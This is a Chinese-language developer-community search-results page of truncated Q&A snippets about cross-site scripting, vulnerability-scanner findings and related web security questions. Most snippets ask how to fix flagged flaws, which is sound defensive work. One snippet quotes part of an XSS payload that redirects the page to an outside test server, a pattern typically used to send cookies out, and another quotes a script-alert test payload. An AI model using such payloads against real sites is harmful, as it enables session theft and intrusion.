腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
Richtext
字段
的
跨
站点
脚本
漏洞
问题
lotus-notes
为了使我们
的
应用程序更安全,我们正在尝试修复一些安全级别的
问题
。我们试图解决
的
一个这样
的
问题
是:
跨
站点
脚本
。 以下是
问题
的
详细信息。
跨
站点
脚本
漏洞
使黑客能够将客户端
脚本
(通常为JavaScript)放入网页中。XSS
漏洞
通常发生在应用程序接受用户输入并将其输出到页面中时,而不对其进行验证、编码或转义。我们正在努
浏览 25
提问于2019-05-14
得票数 0
1
回答
DCP-门户
漏洞
xss
、
vulnerability
、
pci-dss
、
vulnerability-scanners
此
漏洞
来自用于PCI扫描
的
第三方审阅者。我被困了几个月,弄不明白。我已经对我
的
页面使用了卫生设施,但它仍然不能通过PCI扫描。我开始认为这不是一个代码相关
的
问题
。有人能告诉我如何解决这个
问题
吗?DCP-Portal
跨
站点
脚本
错误在此主机上运行
的
DCP-Portal版本(5.3.2及更早版本)中存在多个
跨
站点
脚本
漏洞
。这些
漏洞
允许
浏览 0
提问于2022-03-09
得票数 0
1
回答
PCI扫描显示未知
漏洞
。
vulnerability
、
pci-dss
Basit提交模块
跨
站点
脚本
漏洞
这两个
漏洞
已经发现,在扫描对我们
的
网站,由第三方审查。我无法解决这些
问题
。有谁能对这些
问题
有所了解,以及如何解决这些
问题
?
浏览 0
提问于2019-04-08
得票数 1
回答已采纳
2
回答
将表单参数安全地反映为Javascript变量,而不会扰乱Fortify
javascript
、
asp.net
、
fortify
我正在使用Fortify静态代码分析来分析我们
的
软件。Fortify报告我们有一个
跨
站点
脚本
漏洞
(反映
的
),而我并不认为我们真的有。我可以试着与我
的
客户争论这一点,让他们相信它是安全
的
(这是没有人想做
的
,因为它需要审计),或者让Fortify高兴; 我从ASP.NET中
的
请求中获取一个表单参数,然后‘手动’(不使用API)对其进行转义(转义所有换行符、字符、引号并删除任何
脚本
标记)。Form.Par
浏览 0
提问于2014-05-10
得票数 0
1
回答
微软是否在其在线托管产品中记录了XSS对引导和jquery
漏洞
的
缓解?
microsoft-dynamics-crm
、
jquery
、
bootstrap
我正在审查一份web扫描
漏洞
报告,并相信微软已经减轻了报告
的
漏洞
(基于jquery和引导版本),但是从Microsoft找到文档会很有帮助。“根据其自我报告
的
版本号,Bootstrap在4.3.1之前为3.x先验3.4.1或4.x。因此,通过工具提示和popover插件
的
数据模板属性,它可能会受到
跨
站点
脚本
漏洞
的
影响。请注意,扫描仪没有测试这些
问题
,而是只依赖应用程序
的
自报告版本号
浏览 0
提问于2020-07-07
得票数 0
1
回答
为什么XSS评分对V2
的
完整性有部分影响?
xss
、
risk-analysis
、
cvss
来自CVSS v2 完整指南:我知道
跨
站点
脚本
可以分为三种主要类型:反射XSS、存储XSS和
浏览 0
提问于2016-10-09
得票数 3
3
回答
不使用/利用文件名中
的
XSS
web-application
、
xss
、
file-upload
我试图利用文件上传
的
文件名
字段
中
的
漏洞
进行攻击。web应用程序无法正确验证上传文件
的
文件名,因此存在存储
的
跨
站点
脚本
漏洞
。我
的
问题
是,每当我试图重命名文件以包含类似于下面的有效负载时,我就不能在文件名中包括/。 document.location='http://my_test_server.com/bla.php?甚至有可能利用这
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
2
回答
Wordpress 4.7.6
漏洞
?
vulnerability
、
wordpress
我有一个wordpress 4.7.6没有插件,但是我注意到:https://cxsecurity.com/cveshow/CVE-2017-14723和其他
的
漏洞
都是<4.8.2
的
。我
的
问题
是,我试图在我
的
wordpress中寻找如何利用它,但我没有找到如何利用它。我很感谢你
的
帮助,我假设如果它是<4.8.2,它是脆弱
的
,对吗?
浏览 0
提问于2017-10-26
得票数 1
3
回答
jQuery
跨
站点
脚本
-这是什么
jquery
漏洞
描述Pattern found:
浏览 7
提问于2014-09-09
得票数 0
回答已采纳
2
回答
Web应用程序
漏洞
扫描-假阳性-识别和消除
web-application
、
vulnerability-scanners
Web应用程序
漏洞
和潜在
的
假阳性 作为渗透测试器,应用程序
漏洞
扫描是任何渗透测试方法
的
重要组成部分。在应用程序扫描阶段,可能会出现几种不同类型
的
漏洞
。主要是..。SQL注入/盲目SQL注入、
跨
站点
脚本
/持久性
跨
站点
脚本
、命令注入、XPath注入、SOAP/AJAX攻击、CSRF/HTTP响应拆分、任意文件上传攻击、远程文件包括(PHP代码注入
浏览 0
提问于2014-10-15
得票数 1
2
回答
如果有str_replace,有没有可能做XSS?
php
、
xss
、
owasp
我正在研究
跨
站点
脚本
(XSS)
漏洞
,这里有一个
问题
: 如果有str_replace "<“,有没有可能通过get参数传递代码来执行
跨
站点
脚本
?</b>或<script>alert('Ha-Ha-Ha')</script>,以便执行
脚本
?
浏览 16
提问于2021-04-12
得票数 1
2
回答
为什么Magento管理操作重定向到管理仪表板?
magento
、
magento2.4
<module name="Vendor_ModuleName" /></router> 注意:我想在不关闭管理>存储>配置>高级>管理>安全性>向URL添加秘密密钥
的
情况下使用
浏览 1
提问于2021-12-22
得票数 0
1
回答
防止
跨
站点
脚本
C#
c#
、
xss
嗨,我使用HPE扫描我
的
应用程序,它在我
的
代码上显示了一个
跨
站点
脚本
漏洞
。 如何防止基于以下代码
的
跨
站点
脚本
编写?
浏览 1
提问于2016-12-23
得票数 0
回答已采纳
1
回答
是否有像htmlEscaper()这样
的
特定函数来用速度模板语言转义VTL
脚本
?
xss
、
vtl
在使用VTL
脚本
时,我需要解决反映
的
XSS
跨
站点
脚本
漏洞
。
浏览 4
提问于2022-06-20
得票数 0
1
回答
HTTP请求/响应期间
的
重要验证
html
、
security
在http请求/响应期间可以做哪些重要
的
验证/处理,以保护web应用程序免受
跨
站点
脚本
、
跨
站点
请求伪造和任何其他安全攻击等
漏洞
的
攻击?
浏览 2
提问于2010-01-27
得票数 1
1
回答
oracle weblogic
漏洞
attacks
、
webserver
、
oracle
我搜索了Oracle逻辑
漏洞
并发现了此
漏洞
: Oracle
跨
站点
脚本
和数据
漏洞
操作( WebLogic http://secunia.com/community/advisories/51501)--我想要一些示例攻击场景来测试我
的
网站是否存在此
漏洞
浏览 0
提问于2014-03-06
得票数 0
1
回答
什么*实际上*是Java applets
漏洞
?
exploit
、
vulnerability
、
java
、
cve
、
applet
潜在jre中
的
漏洞
?在浏览器里?在"applet“组件中? 究竟什么是剥削?
浏览 0
提问于2018-10-12
得票数 3
回答已采纳
3
回答
XSS是
漏洞
还是攻击?
xss
为什么这么多人对XSS使用不同
的
防御(攻击或
漏洞
)?我认为XSS是攻击,利用不足
的
过滤
漏洞
。我说
的
对吗? 这个
问题
的
答案应该明确地解释什么是XSS
的
正确定义,并附加注释,为什么人们使用不同
的
定义。
浏览 0
提问于2014-10-16
得票数 4
回答已采纳
1
回答
这些
跨
站点
脚本
修复是如何工作
的
?
c#
、
xss
我
的
代码应该已经清除了
跨
站点
脚本
漏洞
。"-" : SelectedPlan.VisionPlan.PlanCategory %> 简单地添加这些冒号如何防止
跨
站点
脚本
攻击
的
发生?
浏览 0
提问于2015-11-24
得票数 1
回答已采纳
1
回答
viewstate何时停止CSRF,何时失败?
asp.net
、
security
、
iis
、
csrf
声称,即使请求中存在视图状态,它仍然容易受到CSRF
的
攻击。然而,利用
漏洞
并不能解释为什么会出现这种情况。
浏览 0
提问于2012-07-23
得票数 1
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
跨站脚本漏洞及不安全的直接对象引用
ASP.NET Core中的OWASP Top 10 十大风险-跨站点脚本攻击
PHP 表单安全性验证
Web前端安全之跨站脚本攻击实战
bWAPP-用于练习黑客的极其恶劣的Web应用程序
热门
标签
更多标签
活动推荐
运营活动
广告
关闭
领券